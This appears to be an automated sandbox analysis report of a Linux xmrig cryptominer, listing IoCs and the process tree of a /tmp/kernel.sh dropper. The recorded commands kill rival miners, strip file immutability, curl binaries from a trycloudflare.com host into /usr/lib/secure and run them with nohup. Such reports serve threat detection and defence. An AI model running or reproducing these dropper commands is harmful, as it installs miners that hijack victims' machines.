xmrig | 7bc7583c91a5b3880dcb9ae735530d4990d13f67216f08dfa140f927a09c1a87

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	udiskssd

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/board_name	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/board_version	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/product_version	udiskssd
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	udiskssd

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	udiskssd

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	udiskssd
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/online	udiskssd
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	udiskssd
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	udiskssd
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	udiskssd
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/firmware/dmi/tables/DMI	udiskssd
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	udiskssd
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	atdb
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/online	udiskssd
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/1849/stat	pgrep
File opened for reading	/proc/6118/cmdline	ps
File opened for reading	/proc/2138/ctty	pgrep
File opened for reading	/proc/35/stat	pgrep
File opened for reading	/proc/385/cmdline	pgrep
File opened for reading	/proc/201/cmdline	pgrep
File opened for reading	/proc/1862/cmdline	pgrep
File opened for reading	/proc/1047/ctty	pgrep
File opened for reading	/proc/2119/stat	ps
File opened for reading	/proc/2106/status	pgrep
File opened for reading	/proc/2157/ctty	pgrep
File opened for reading	/proc/2140/cmdline	pgrep
File opened for reading	/proc/3/status	pgrep
File opened for reading	/proc/2124/stat	pgrep
File opened for reading	/proc/56/cgroup	pgrep
File opened for reading	/proc/2356/status	pgrep
File opened for reading	/proc/2080/status	ps
File opened for reading	/proc/2629/cgroup	pgrep
File opened for reading	/proc/1996/ctty	pgrep
File opened for reading	/proc/2346/cgroup	pgrep
File opened for reading	/proc/61/stat	pgrep
File opened for reading	/proc/1056/cgroup	pgrep
File opened for reading	/proc/194/status	pgrep
File opened for reading	/proc/890/cmdline	pgrep
File opened for reading	/proc/2437/cmdline	ps
File opened for reading	/proc/787/cgroup	pgrep
File opened for reading	/proc/780/cmdline	ps
File opened for reading	/proc/45/status	pgrep
File opened for reading	/proc/1844/status	pgrep
File opened for reading	/proc/2388/cmdline	ps
File opened for reading	/proc/1061/cgroup	pgrep
File opened for reading	/proc/2283/status	ps
File opened for reading	/proc/23/stat	pgrep
File opened for reading	/proc/2164/status	pgrep
File opened for reading	/proc/2628/stat	pgrep
File opened for reading	/proc/189/cgroup	pgrep
File opened for reading	/proc/457/cgroup	pgrep
File opened for reading	/proc/598/stat	pgrep
File opened for reading	/proc/1114/environ	ps
File opened for reading	/proc/2424/ctty	pgrep
File opened for reading	/proc/43/status	pgrep
File opened for reading	/proc/38/cmdline	pgrep
File opened for reading	/proc/50/cmdline	pgrep
File opened for reading	/proc/36/cmdline	pgrep
File opened for reading	/proc/30/cgroup	pgrep
File opened for reading	/proc/1936/stat	ps
File opened for reading	/proc/2363/cmdline	pgrep
File opened for reading	/proc/32/ctty	pgrep
File opened for reading	/proc/2401/stat	pgrep
File opened for reading	/proc/890/status	pgrep
File opened for reading	/proc/1335/ctty	pgrep
File opened for reading	/proc/1124/stat	pgrep
File opened for reading	/proc/1833/cmdline	pgrep
File opened for reading	/proc/6/stat	pgrep
File opened for reading	/proc/71/environ	ps
File opened for reading	/proc/1086/stat	pgrep
File opened for reading	/proc/513/cgroup	pgrep
File opened for reading	/proc/15/cgroup	pgrep
File opened for reading	/proc/196/cgroup	pgrep
File opened for reading	/proc/80/ctty	pgrep
File opened for reading	/proc/1056/ctty	pgrep
File opened for reading	/proc/1335/stat	pgrep
File opened for reading	/proc/2164/stat	pgrep
File opened for reading	/proc/780/cgroup	pgrep

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
2680	pgrep

cURL User-Agent 1 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	9	curl/8.5.0

/tmp/kernel.sh
/tmp/kernel.sh
1⤵
PID:2632
- /usr/bin/pgrep
  pgrep -x kdevtmpfsi
  2⤵
  PID:2635
- /usr/bin/pgrep
  pgrep -x kinsing
  2⤵
  PID:2636
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  PID:2637
- /usr/bin/pgrep
  pgrep -x xmrigDaemon
  2⤵
  - Reads runtime system information
  PID:2638
- /usr/bin/pgrep
  pgrep -x xmrigMiner
  2⤵
  PID:2639
- /usr/bin/pgrep
  pgrep -x xmrigMinerd
  2⤵
  PID:2641
- /usr/bin/pgrep
  pgrep -x xmrigMinerDaemon
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2644
- /usr/bin/pgrep
  pgrep -x xmrigMinerServer
  2⤵
  - Reads runtime system information
  PID:2645
- /usr/bin/pgrep
  pgrep -x xmrigMinerServerDaemon
  2⤵
  PID:2646
- /usr/bin/pgrep
  pgrep -x bash2
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2647
- /usr/bin/pgrep
  pgrep -x .network-setup
  2⤵
  - Reads runtime system information
  PID:2648
- /usr/bin/pgrep
  pgrep -x syshd
  2⤵
  PID:2649
- /usr/bin/pgrep
  pgrep -x /usr/.network-setup/config.json
  2⤵
  PID:2650
- /usr/bin/pgrep
  pgrep -x bashirc
  2⤵
  - Reads runtime system information
  PID:2651
- /usr/bin/pgrep
  pgrep -x masscan
  2⤵
  PID:2652
- /usr/bin/pgrep
  pgrep -x cronb.sh
  2⤵
  PID:2653
- /usr/bin/pgrep
  pgrep -x crond.sh
  2⤵
  - Reads CPU attributes
  PID:2654
- /usr/bin/pgrep
  pgrep -x linuxsys
  2⤵
  - Reads CPU attributes
  PID:2655
- /usr/bin/pgrep
  pgrep -x miner
  2⤵
  PID:2656
- /usr/bin/pgrep
  pgrep -x gitlabw
  2⤵
  PID:2657
- /usr/bin/pgrep
  pgrep -x xmp
  2⤵
  PID:2658
- /usr/bin/pgrep
  pgrep -x juiceSSH
  2⤵
  PID:2659
- /usr/bin/pgrep
  pgrep -x khnug
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2660
- /usr/bin/pgrep
  pgrep -x Linux2
  2⤵
  - Reads CPU attributes
  PID:2661
- /usr/bin/pgrep
  pgrep -x kthreaddi
  2⤵
  PID:2662
- /usr/bin/pgrep
  pgrep -x kkssl
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2663
- /usr/bin/pgrep
  pgrep -x cnrig
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2664
- /usr/bin/pgrep
  pgrep -x stratum
  2⤵
  - Reads runtime system information
  PID:2665
- /usr/bin/pgrep
  pgrep -x vscode
  2⤵
  PID:2666
- /usr/bin/pgrep
  pgrep -x "runsv puma"
  2⤵
  PID:2667
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  PID:2668
- /usr/bin/pgrep
  pgrep -x c3pool
  2⤵
  PID:2669
- /usr/bin/pgrep
  pgrep -x kthreaddk
  2⤵
  PID:2670
- /usr/bin/pgrep
  pgrep -x dbused
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2671
- /usr/bin/pgrep
  pgrep -x kdevtmpfsi
  2⤵
  PID:2672
- /usr/bin/pgrep
  pgrep -x kinsing
  2⤵
  PID:2673
- /usr/bin/pgrep
  pgrep -x supportxmr
  2⤵
  PID:2674
- /usr/bin/pgrep
  pgrep -x xmr
  2⤵
  PID:2675
- /usr/bin/pgrep
  pgrep -x kthreaddw
  2⤵
  PID:2676
- /usr/bin/pgrep
  pgrep -x klibsystem4
  2⤵
  - Reads CPU attributes
  PID:2677
- /usr/bin/pgrep
  pgrep -x klibsystem5
  2⤵
  PID:2678
- /usr/bin/pgrep
  pgrep -x kworkerr
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2679
- /usr/bin/pgrep
  pgrep -x ipv6_addrconfd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:2680
- /usr/bin/pgrep
  pgrep -x ksoftriqd
  2⤵
  - Reads CPU attributes
  PID:2681
- /usr/bin/pgrep
  pgrep -x 8a9ed70
  2⤵
  PID:2682
- /usr/bin/pgrep
  pgrep -x xmrigMiner
  2⤵
  PID:2683
- /usr/bin/pgrep
  pgrep -x kthreaddo
  2⤵
  - Reads runtime system information
  PID:2684
- /usr/bin/pgrep
  pgrep -x xssai
  2⤵
  - Reads runtime system information
  PID:2685
- /usr/bin/pgrep
  pgrep -x k1.sh
  2⤵
  PID:2686
- /usr/bin/pgrep
  pgrep -x base64
  2⤵
  PID:2687
- /usr/bin/pgrep
  pgrep -x java-deamon
  2⤵
  PID:2688
- /usr/bin/pgrep
  pgrep -x up.elf
  2⤵
  PID:2689
- /usr/bin/pgrep
  pgrep -x logrotate
  2⤵
  PID:2690
- /usr/bin/pgrep
  pgrep -x "\\-bash"
  2⤵
  PID:2691
- /usr/bin/pgrep
  pgrep -x b64decode
  2⤵
  - Reads CPU attributes
  PID:2692
- /usr/bin/pgrep
  pgrep -x MCf8
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2693
- /usr/bin/pgrep
  pgrep -x mysqldd
  2⤵
  PID:2694
- /usr/bin/pgrep
  pgrep -x monero
  2⤵
  PID:2695
- /usr/bin/pgrep
  pgrep -x sshpass
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2696
- /usr/bin/pgrep
  pgrep -x sshexec
  2⤵
  - Reads CPU attributes
  PID:2697
- /usr/bin/pgrep
  pgrep -x attack
  2⤵
  PID:2698
- /usr/bin/pgrep
  pgrep -x dovecat
  2⤵
  - Reads CPU attributes
  PID:2699
- /usr/bin/pgrep
  pgrep -x javae
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2700
- /usr/bin/pgrep
  pgrep -x donate
  2⤵
  PID:2701
- /usr/bin/pgrep
  pgrep -x scan.log
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2702
- /usr/bin/pgrep
  pgrep -x xmr-stak
  2⤵
  PID:2703
- /usr/bin/pgrep
  pgrep -x crond64
  2⤵
  PID:2704
- /usr/bin/pgrep
  pgrep -x /tmp/java
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2705
- /usr/bin/pgrep
  pgrep -x pastebin
  2⤵
  PID:2719
- /usr/bin/pgrep
  pgrep -x so.txt
  2⤵
  PID:2720
- /usr/bin/pgrep
  pgrep -x "bash -s 3673"
  2⤵
  PID:2721
- /usr/bin/pgrep
  pgrep -x 8005/cc5
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2722
- /usr/bin/pgrep
  pgrep -x /tmp/system
  2⤵
  PID:2723
- /usr/bin/pgrep
  pgrep -x ./cliented
  2⤵
  - Reads runtime system information
  PID:2724
- /usr/bin/pgrep
  pgrep -x .inis
  2⤵
  PID:2725
- /usr/bin/pgrep
  pgrep -x certutil
  2⤵
  PID:2726
- /usr/bin/pgrep
  pgrep -x excludefile
  2⤵
  - Reads runtime system information
  PID:2727
- /usr/bin/pgrep
  pgrep -x agettyd
  2⤵
  PID:2728
- /usr/bin/pgrep
  pgrep -x kthreaddkk
  2⤵
  PID:2729
- /usr/bin/pgrep
  pgrep -x /dev/shm
  2⤵
  PID:2730
- /usr/bin/pgrep
  pgrep -x /var/tmp
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2731
- /usr/bin/pgrep
  pgrep -x ./python
  2⤵
  PID:2732
- /usr/bin/pgrep
  pgrep -x ./crun
  2⤵
  PID:2733
- /usr/bin/pgrep
  pgrep -x "bash -s kthreaddk"
  2⤵
  PID:2734
- /usr/bin/pgrep
  pgrep -x ./.
  2⤵
  PID:2741
- /usr/bin/pgrep
  pgrep -x 118/cf.sh
  2⤵
  - Reads runtime system information
  PID:2742
- /usr/bin/pgrep
  pgrep -x ./lin64
  2⤵
  PID:2743
- /usr/bin/pgrep
  pgrep -x confluence/install.sh
  2⤵
  PID:2744
- /usr/bin/pgrep
  pgrep -x unls64.sh
  2⤵
  PID:2745
- /usr/bin/pgrep
  pgrep -x ./system-xfwm4-session
  2⤵
  - Reads CPU attributes
  PID:2746
- /usr/bin/pgrep
  pgrep -x ./httpd
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2747
- /usr/bin/pgrep
  pgrep -x loligang
  2⤵
  PID:2748
- /usr/bin/pgrep
  pgrep -x .6379
  2⤵
  PID:2749
- /usr/bin/pgrep
  pgrep -x load.sh
  2⤵
  PID:2750
- /usr/bin/pgrep
  pgrep -x init.sh
  2⤵
  PID:2751
- /usr/bin/pgrep
  pgrep -x solr.sh
  2⤵
  PID:2752
- /usr/bin/pgrep
  pgrep -x .rsyslogds
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2753
- /usr/bin/pgrep
  pgrep -x sysDworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2754
- /usr/bin/pgrep
  pgrep -x pnscan
  2⤵
  PID:2755
- /usr/bin/pgrep
  pgrep -x sysguard
  2⤵
  PID:2756
- /usr/bin/pgrep
  pgrep -x solrd
  2⤵
  PID:2757
- /usr/bin/pgrep
  pgrep -x polska
  2⤵
  PID:2758
- /usr/bin/pgrep
  pgrep -x meminitsrv
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2759
- /usr/bin/pgrep
  pgrep -x networkservice
  2⤵
  PID:2760
- /usr/bin/pgrep
  pgrep -x sysupdate
  2⤵
  PID:2761
- /usr/bin/pgrep
  pgrep -x phpguard
  2⤵
  PID:2762
- /usr/bin/pgrep
  pgrep -x phpupdate
  2⤵
  PID:2763
- /usr/bin/pgrep
  pgrep -x networkmanager
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2764
- /usr/bin/pgrep
  pgrep -x knthread
  2⤵
  - Reads CPU attributes
  PID:2765
- /usr/bin/pgrep
  pgrep -x mysqlserver
  2⤵
  - Reads CPU attributes
  PID:2766
- /usr/bin/pgrep
  pgrep -x gitlabkill
  2⤵
  PID:2767
- /usr/bin/pgrep
  pgrep -x watchbog
  2⤵
  PID:2768
- /usr/bin/pgrep
  pgrep -x zgrab
  2⤵
  - Reads runtime system information
  PID:2769
- /usr/bin/pgrep
  pgrep -x udiskssd
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2770
- /usr/bin/ps
  ps -ef
  2⤵
  - Checks CPU configuration
  PID:2771
- /usr/bin/grep
  grep atdb
  2⤵
  PID:2772
- /usr/bin/grep
  grep -v grep
  2⤵
  PID:2773
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2774
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2775
- /usr/bin/id
  id -u
  2⤵
  PID:2776
- /usr/bin/id
  id -u
  2⤵
  PID:2777
- /usr/bin/chattr
  chattr -ia /usr/lib/secure
  2⤵
  - Attempts to change immutable files
  PID:2778
- /usr/bin/rm
  rm -rf /usr/lib/secure
  2⤵
  PID:2779
- /usr/bin/mkdir
  mkdir -p /usr/lib/secure
  2⤵
  PID:2780
- /usr/bin/chmod
  chmod +w /usr/lib/secure
  2⤵
  PID:2781
- /usr/bin/curl
  curl -ks https://throw-shut-discuss-pirates.trycloudflare.com/initd -o /usr/lib/secure/udiskssd
  2⤵
  PID:2782
- /usr/bin/chmod
  chmod +x /usr/lib/secure/udiskssd
  2⤵
  - File and Directory Permissions Modification
  PID:2784
- /usr/bin/curl
  curl -ks https://throw-shut-discuss-pirates.trycloudflare.com/dbus -o /usr/lib/secure/atdb
  2⤵
  PID:2785
- /usr/bin/chmod
  chmod +x /usr/lib/secure/atdb
  2⤵
  - File and Directory Permissions Modification
  PID:2787
- /usr/bin/chmod
  chmod +x /usr/lib/secure/atdb /usr/lib/secure/udiskssd
  2⤵
  - File and Directory Permissions Modification
  PID:2788
- /usr/bin/nohup
  nohup /usr/lib/secure/udiskssd
  2⤵
  PID:2789
- /usr/bin/sleep
  sleep 3
  2⤵
  PID:2790
- /usr/lib/secure/udiskssd
  /usr/lib/secure/udiskssd
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2789
- /usr/bin/sleep
  sleep 3
  2⤵
  PID:2799
- /usr/bin/nohup
  nohup /usr/lib/secure/atdb
  2⤵
  PID:2798
- /usr/lib/secure/atdb
  /usr/lib/secure/atdb
  2⤵
  - Executes dropped EXE
  - Enumerates kernel/hardware configuration
  PID:2798
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2803
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2804
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2805
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2810
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2811
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2812
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2813
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2817
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2818
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2819
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:2820
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2821
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2858
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2859
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:2860
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2861
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads runtime system information
    PID:2863
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2864
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2865
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2866
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2869
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2870
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2871
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2872
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2873
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2874
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2875
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2876
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2877
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2878
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2879
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2880
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2881
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2882
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads CPU attributes
    PID:2883
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:2884
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2902
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2903
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2904
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2908
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2909
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2910
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2911
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2912
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2913
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2914
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    - Reads runtime system information
    PID:2915
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2916
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2927
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2928
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2931
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2932
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2936
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2937
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2938
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    - Reads CPU attributes
    PID:2939
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2941
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2942
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2943
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2944
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:2973
- - /bin/readlink
    readlink -f /proc/2791/exe
    3⤵
    PID:2989
- - /bin/pgrep
    pgrep -x udiskssd
    3⤵
    PID:2991
- - /bin/pgrep
    pgrep -c udiskssd
    3⤵
    PID:2992
- - /bin/ps
    ps axo "pid,comm,pcpu"
    3⤵
    PID:3045
